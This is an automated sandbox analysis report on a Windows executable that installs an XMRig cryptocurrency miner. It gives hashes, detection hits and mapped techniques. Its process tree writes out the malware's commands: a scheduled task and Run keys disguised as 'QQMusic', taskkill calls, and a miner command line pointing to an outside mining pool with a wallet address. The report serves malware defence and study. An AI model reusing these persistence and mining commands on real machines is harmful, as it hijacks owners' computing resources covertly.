xmrig | d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
13-06-2024 02:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Size

9.0MB
MD5

2d927fdb462570728a981443bf36d19f
SHA1

eb4f351d937729b14a196bf228ba12a2ff07e73e
SHA256

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239
SHA512

efdf3b568fa07d67bb89eb8880c5140653321f9267c771045d1c7be6a6e88fd680059b779d2e4da497e0a88ff1e9adac6e293bb254e5c4dda776aafd518097c9
SSDEEP

196608:rhHMBGC3PtXtT+Was8/wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G02wuwasMdJOnZKVSaaNZOn

Score

10^/10

xmrig miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects Windows executables referencing non-Windows User-Agents 1 IoCs

resource	yara_rule
behavioral1/files/0x0009000000015ca2-152.dat	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA

UPX dump on OEP (original entry point) 27 IoCs

resource	yara_rule
behavioral1/files/0x000a000000015cb8-6.dat	UPX
behavioral1/memory/2764-10-0x000000013F0B0000-0x000000013F6F4000-memory.dmp	UPX
behavioral1/memory/2764-135-0x000000013F0B0000-0x000000013F6F4000-memory.dmp	UPX
behavioral1/memory/2764-141-0x000000013F0B0000-0x000000013F6F4000-memory.dmp	UPX
behavioral1/memory/1520-144-0x000000013F620000-0x000000013FC64000-memory.dmp	UPX
behavioral1/memory/1520-146-0x000000013F620000-0x000000013FC64000-memory.dmp	UPX
behavioral1/memory/1036-149-0x000000013FB50000-0x0000000140194000-memory.dmp	UPX
behavioral1/memory/1036-153-0x000000013FB50000-0x0000000140194000-memory.dmp	UPX
behavioral1/memory/1036-155-0x000000013FB50000-0x0000000140194000-memory.dmp	UPX
behavioral1/memory/2808-158-0x000000013F220000-0x000000013F864000-memory.dmp	UPX
behavioral1/memory/2808-161-0x000000013F220000-0x000000013F864000-memory.dmp	UPX
behavioral1/memory/2968-164-0x000000013F570000-0x000000013FBB4000-memory.dmp	UPX
behavioral1/memory/2968-166-0x000000013F570000-0x000000013FBB4000-memory.dmp	UPX
behavioral1/memory/2968-168-0x000000013F570000-0x000000013FBB4000-memory.dmp	UPX
behavioral1/memory/844-171-0x000000013F560000-0x000000013FBA4000-memory.dmp	UPX
behavioral1/memory/2228-174-0x000000013F920000-0x000000013FF64000-memory.dmp	UPX
behavioral1/memory/2228-176-0x000000013F920000-0x000000013FF64000-memory.dmp	UPX
behavioral1/memory/2228-178-0x000000013F920000-0x000000013FF64000-memory.dmp	UPX
behavioral1/memory/796-181-0x000000013F930000-0x000000013FF74000-memory.dmp	UPX
behavioral1/memory/796-183-0x000000013F930000-0x000000013FF74000-memory.dmp	UPX
behavioral1/memory/2644-186-0x000000013FAA0000-0x00000001400E4000-memory.dmp	UPX
behavioral1/memory/2644-188-0x000000013FAA0000-0x00000001400E4000-memory.dmp	UPX
behavioral1/memory/2644-190-0x000000013FAA0000-0x00000001400E4000-memory.dmp	UPX
behavioral1/memory/1976-193-0x000000013F110000-0x000000013F754000-memory.dmp	UPX
behavioral1/memory/1976-195-0x000000013F110000-0x000000013F754000-memory.dmp	UPX
behavioral1/memory/2236-198-0x000000013FED0000-0x0000000140514000-memory.dmp	UPX
behavioral1/memory/2236-200-0x000000013FED0000-0x0000000140514000-memory.dmp	UPX

XMRig Miner payload 15 IoCs

miner

resource	yara_rule
behavioral1/memory/2764-135-0x000000013F0B0000-0x000000013F6F4000-memory.dmp	xmrig
behavioral1/memory/2764-141-0x000000013F0B0000-0x000000013F6F4000-memory.dmp	xmrig
behavioral1/memory/1520-146-0x000000013F620000-0x000000013FC64000-memory.dmp	xmrig
behavioral1/memory/1036-153-0x000000013FB50000-0x0000000140194000-memory.dmp	xmrig
behavioral1/memory/1036-155-0x000000013FB50000-0x0000000140194000-memory.dmp	xmrig
behavioral1/memory/2808-161-0x000000013F220000-0x000000013F864000-memory.dmp	xmrig
behavioral1/memory/2968-166-0x000000013F570000-0x000000013FBB4000-memory.dmp	xmrig
behavioral1/memory/2968-168-0x000000013F570000-0x000000013FBB4000-memory.dmp	xmrig
behavioral1/memory/2228-176-0x000000013F920000-0x000000013FF64000-memory.dmp	xmrig
behavioral1/memory/2228-178-0x000000013F920000-0x000000013FF64000-memory.dmp	xmrig
behavioral1/memory/796-183-0x000000013F930000-0x000000013FF74000-memory.dmp	xmrig
behavioral1/memory/2644-188-0x000000013FAA0000-0x00000001400E4000-memory.dmp	xmrig
behavioral1/memory/2644-190-0x000000013FAA0000-0x00000001400E4000-memory.dmp	xmrig
behavioral1/memory/1976-195-0x000000013F110000-0x000000013F754000-memory.dmp	xmrig
behavioral1/memory/2236-200-0x000000013FED0000-0x0000000140514000-memory.dmp	xmrig

Executes dropped EXE 13 IoCs

pid	Process
2764	spreadTpqrst.exe
2460	SMB.exe
1520	spreadTpqrst.exe
1036	spreadTpqrst.exe
856	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2808	spreadTpqrst.exe
2968	spreadTpqrst.exe
844	spreadTpqrst.exe
2228	spreadTpqrst.exe
796	spreadTpqrst.exe
2644	spreadTpqrst.exe
1976	spreadTpqrst.exe
2236	spreadTpqrst.exe

Loads dropped DLL 2 IoCs

pid	Process
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

UPX packed file 27 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000a000000015cb8-6.dat	upx
behavioral1/memory/2764-10-0x000000013F0B0000-0x000000013F6F4000-memory.dmp	upx
behavioral1/memory/2764-135-0x000000013F0B0000-0x000000013F6F4000-memory.dmp	upx
behavioral1/memory/2764-141-0x000000013F0B0000-0x000000013F6F4000-memory.dmp	upx
behavioral1/memory/1520-144-0x000000013F620000-0x000000013FC64000-memory.dmp	upx
behavioral1/memory/1520-146-0x000000013F620000-0x000000013FC64000-memory.dmp	upx
behavioral1/memory/1036-149-0x000000013FB50000-0x0000000140194000-memory.dmp	upx
behavioral1/memory/1036-153-0x000000013FB50000-0x0000000140194000-memory.dmp	upx
behavioral1/memory/1036-155-0x000000013FB50000-0x0000000140194000-memory.dmp	upx
behavioral1/memory/2808-158-0x000000013F220000-0x000000013F864000-memory.dmp	upx
behavioral1/memory/2808-161-0x000000013F220000-0x000000013F864000-memory.dmp	upx
behavioral1/memory/2968-164-0x000000013F570000-0x000000013FBB4000-memory.dmp	upx
behavioral1/memory/2968-166-0x000000013F570000-0x000000013FBB4000-memory.dmp	upx
behavioral1/memory/2968-168-0x000000013F570000-0x000000013FBB4000-memory.dmp	upx
behavioral1/memory/844-171-0x000000013F560000-0x000000013FBA4000-memory.dmp	upx
behavioral1/memory/2228-174-0x000000013F920000-0x000000013FF64000-memory.dmp	upx
behavioral1/memory/2228-176-0x000000013F920000-0x000000013FF64000-memory.dmp	upx
behavioral1/memory/2228-178-0x000000013F920000-0x000000013FF64000-memory.dmp	upx
behavioral1/memory/796-181-0x000000013F930000-0x000000013FF74000-memory.dmp	upx
behavioral1/memory/796-183-0x000000013F930000-0x000000013FF74000-memory.dmp	upx
behavioral1/memory/2644-186-0x000000013FAA0000-0x00000001400E4000-memory.dmp	upx
behavioral1/memory/2644-188-0x000000013FAA0000-0x00000001400E4000-memory.dmp	upx
behavioral1/memory/2644-190-0x000000013FAA0000-0x00000001400E4000-memory.dmp	upx
behavioral1/memory/1976-193-0x000000013F110000-0x000000013F754000-memory.dmp	upx
behavioral1/memory/1976-195-0x000000013F110000-0x000000013F754000-memory.dmp	upx
behavioral1/memory/2236-198-0x000000013FED0000-0x0000000140514000-memory.dmp	upx
behavioral1/memory/2236-200-0x000000013FED0000-0x0000000140514000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe"	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe"	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
File opened (read-only)	\??\VBoxMiniRdrDN	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2512	schtasks.exe

Gathers network information 2 TTPs 5 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
3040	ipconfig.exe
2288	ipconfig.exe
2116	ipconfig.exe
1268	ipconfig.exe
2216	ipconfig.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
2700	taskkill.exe
2604	taskkill.exe
2580	taskkill.exe
2956	taskkill.exe
2972	taskkill.exe
1968	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

description	pid	Process
Token: SeDebugPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeBackupPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeBackupPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeBackupPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeBackupPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeDebugPrivilege	2580	taskkill.exe
Token: SeLockMemoryPrivilege	2764	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2764	spreadTpqrst.exe
Token: SeDebugPrivilege	2956	taskkill.exe
Token: SeLockMemoryPrivilege	1036	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1036	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2808	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2808	spreadTpqrst.exe
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeLockMemoryPrivilege	2968	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2968	spreadTpqrst.exe
Token: SeDebugPrivilege	1968	taskkill.exe
Token: SeLockMemoryPrivilege	2228	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2228	spreadTpqrst.exe
Token: SeDebugPrivilege	2700	taskkill.exe
Token: SeLockMemoryPrivilege	2644	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2644	spreadTpqrst.exe
Token: SeDebugPrivilege	2604	taskkill.exe
Token: SeLockMemoryPrivilege	1976	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1976	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2236	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2236	spreadTpqrst.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 328 wrote to memory of 2880	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	30
PID 328 wrote to memory of 2880	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	30
PID 328 wrote to memory of 2880	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	30
PID 328 wrote to memory of 2880	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	30
PID 328 wrote to memory of 2784	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	32
PID 328 wrote to memory of 2784	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	32
PID 328 wrote to memory of 2784	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	32
PID 328 wrote to memory of 2784	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	32
PID 2880 wrote to memory of 2512	2880	cmd.exe	33
PID 2880 wrote to memory of 2512	2880	cmd.exe	33
PID 2880 wrote to memory of 2512	2880	cmd.exe	33
PID 2880 wrote to memory of 2512	2880	cmd.exe	33
PID 2784 wrote to memory of 2580	2784	cmd.exe	35
PID 2784 wrote to memory of 2580	2784	cmd.exe	35
PID 2784 wrote to memory of 2580	2784	cmd.exe	35
PID 2784 wrote to memory of 2580	2784	cmd.exe	35
PID 328 wrote to memory of 3024	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	37
PID 328 wrote to memory of 3024	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	37
PID 328 wrote to memory of 3024	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	37
PID 328 wrote to memory of 3024	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	37
PID 3024 wrote to memory of 2288	3024	cmd.exe	39
PID 3024 wrote to memory of 2288	3024	cmd.exe	39
PID 3024 wrote to memory of 2288	3024	cmd.exe	39
PID 3024 wrote to memory of 2288	3024	cmd.exe	39
PID 328 wrote to memory of 2764	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	40
PID 328 wrote to memory of 2764	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	40
PID 328 wrote to memory of 2764	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	40
PID 328 wrote to memory of 2764	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	40
PID 328 wrote to memory of 2460	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	42
PID 328 wrote to memory of 2460	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	42
PID 328 wrote to memory of 2460	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	42
PID 328 wrote to memory of 2460	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	42
PID 328 wrote to memory of 2816	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	43
PID 328 wrote to memory of 2816	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	43
PID 328 wrote to memory of 2816	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	43
PID 328 wrote to memory of 2816	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	43
PID 328 wrote to memory of 1520	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	45
PID 328 wrote to memory of 1520	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	45
PID 328 wrote to memory of 1520	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	45
PID 328 wrote to memory of 1520	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	45
PID 2816 wrote to memory of 2956	2816	cmd.exe	47
PID 2816 wrote to memory of 2956	2816	cmd.exe	47
PID 2816 wrote to memory of 2956	2816	cmd.exe	47
PID 2816 wrote to memory of 2956	2816	cmd.exe	47
PID 328 wrote to memory of 1036	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	48
PID 328 wrote to memory of 1036	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	48
PID 328 wrote to memory of 1036	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	48
PID 328 wrote to memory of 1036	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	48
PID 1484 wrote to memory of 856	1484	taskeng.exe	51
PID 1484 wrote to memory of 856	1484	taskeng.exe	51
PID 1484 wrote to memory of 856	1484	taskeng.exe	51
PID 1484 wrote to memory of 856	1484	taskeng.exe	51
PID 328 wrote to memory of 1756	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	52
PID 328 wrote to memory of 1756	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	52
PID 328 wrote to memory of 1756	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	52
PID 328 wrote to memory of 1756	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	52
PID 1756 wrote to memory of 2116	1756	cmd.exe	54
PID 1756 wrote to memory of 2116	1756	cmd.exe	54
PID 1756 wrote to memory of 2116	1756	cmd.exe	54
PID 1756 wrote to memory of 2116	1756	cmd.exe	54
PID 328 wrote to memory of 552	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	55
PID 328 wrote to memory of 552	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	55
PID 328 wrote to memory of 552	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	55
PID 328 wrote to memory of 552	328	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	55

C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:2512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im spreadTpqrst.exe&&exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spreadTpqrst.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ipconfig /flushdns
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:2288
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2764
- C:\ProgramData\SMB.exe
  C:\ProgramData\SMB.exe
  2⤵
  - Executes dropped EXE
  PID:2460
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im spreadTpqrst.exe&&exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spreadTpqrst.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2956
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  PID:1520
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ipconfig /flushdns
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:2116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im spreadTpqrst.exe&&exit
  2⤵
  PID:552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spreadTpqrst.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2972
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2808
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ipconfig /flushdns
  2⤵
  PID:2128
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /flushdns
    3⤵
    - Gathers network information
    PID:1268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c taskkill /f /im spreadTpqrst.exe&&exit
  2⤵
  PID:2044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im spreadTpqrst.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1968
- C:\ProgramData\spreadTpqrst.exe
  C:\ProgramData\spreadTpqrst.exe -o stratum+tcp://auto.c3pool.org:19999 -u 44eVhmxJhpzhk8bN8hWUCPCR2YD4dBqgMhyNn2kkMXEWd7XsZtBnhVHiEZqUxUrN35EdEo3P7WsPajPhgLKka78jHd2dTo4 -p X -a cn/r --max-cpu-usage=50 --cpu-priority 3 --cpu-max-threads-hint=50 -K
  2⤵
  - Executes dropped EXE
  PID:844
- C:\ProgramData\spreadTpqrst.exe
